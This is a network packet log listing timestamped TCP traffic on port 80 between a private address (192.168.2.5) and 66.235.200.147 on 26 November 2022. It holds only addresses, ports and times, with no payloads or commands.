Nov 26, 2022 11:17:41.942708015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.942734003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942778111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942787886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.942820072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942862034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942873001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.942936897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942977905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942995071 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.943018913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.943063021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.943103075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.943114042 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.943144083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.943186998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.943197012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.943228006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.943236113 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.943268061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.943310022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.943319082 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.943353891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.943397999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.943403959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.943439960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.943485022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.943486929 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.943542004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.943794966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.324645042 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.341865063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.354986906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355042934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355088949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355125904 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.355130911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355174065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355218887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355218887 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.355261087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355271101 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.355304003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355348110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355391026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355401993 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.355432987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355442047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.355474949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355515957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355557919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355566025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.355598927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355606079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.355643034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355686903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355729103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355736971 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.355771065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355783939 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.355815887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355856895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355901003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355907917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.355942011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.355957985 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.355984926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356029987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356065989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356087923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.356111050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356118917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.356153011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356197119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356239080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356251955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.356288910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356297016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.356340885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356384993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356427908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356447935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.356471062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356479883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.356513023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356570005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356623888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356630087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.356666088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356677055 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.356709003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356755018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356807947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356826067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.356853962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356869936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.356895924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356930971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356973886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.356985092 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.357016087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357023001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.357059956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357093096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357125044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357167959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357173920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.357198954 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.357215881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357264042 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.357270002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357315063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357356071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357373953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.357398033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357439995 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357482910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357490063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.357527018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357536077 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.357580900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357625008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357631922 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.357666016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357707977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357738018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.357748985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357791901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357825041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.357836962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357894897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357907057 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.357939005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.357981920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358026028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358035088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.358062029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358103037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358112097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.358144999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358149052 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.358198881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358247042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358288050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358304977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.358333111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358377934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358381033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.358417988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358460903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358464003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.358503103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358509064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.358546972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358589888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358632088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358648062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.358675003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358675003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.358716965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358760118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358805895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358809948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.358850002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358854055 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.358912945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.358958006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359002113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359014988 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.359042883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359057903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.359086990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359129906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359172106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359181881 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.359214067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359255075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359294891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.359297991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359314919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.359340906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359384060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359426022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359431028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.359467983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359476089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.359510899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359555006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359596014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359608889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.359637976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359643936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.359683037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359688997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.359724045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359730959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.359754086 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.359759092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359771967 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.359800100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359843969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359872103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.359872103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.359888077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359927893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359950066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.359968901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.359993935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360014915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360047102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360089064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360091925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360116959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360131979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360173941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360187054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360219002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360225916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360260963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360271931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360306025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360311031 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360348940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360357046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360390902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360399008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360434055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360444069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360477924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360483885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360523939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360526085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360568047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360574007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360611916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360619068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360655069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360662937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360716105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360719919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360759020 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360761881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360806942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360814095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360850096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360857964 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360893965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360903978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360939980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360949993 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.360982895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.360991001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361026049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361040115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361069918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361074924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361112118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361130953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361155033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361162901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361198902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361207962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361241102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361247063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361285925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361289978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361329079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361340046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361373901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361380100 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361418009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361424923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361459970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361470938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361491919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361509085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361536026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361550093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361579895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361581087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361628056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361633062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361669064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361676931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361711979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361715078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361753941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361774921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361802101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361818075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361846924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361890078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361903906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361946106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.361947060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361994982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.361996889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.362036943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362046957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.362081051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362101078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.362127066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362131119 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.362170935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362188101 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.362211943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.362226963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362271070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362281084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.362314939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362317085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.362358093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362369061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.362409115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.362411022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362457991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362461090 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.362500906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362544060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362555027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.362586021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362593889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.362643957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362654924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.362685919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362694025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.362728119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362742901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.362772942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362783909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.362817049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362849951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362905979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362941027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362984896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.362998962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.363023043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.363029003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363056898 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.363080978 CET	80	49707	66.235.200.147	192.168.2.5
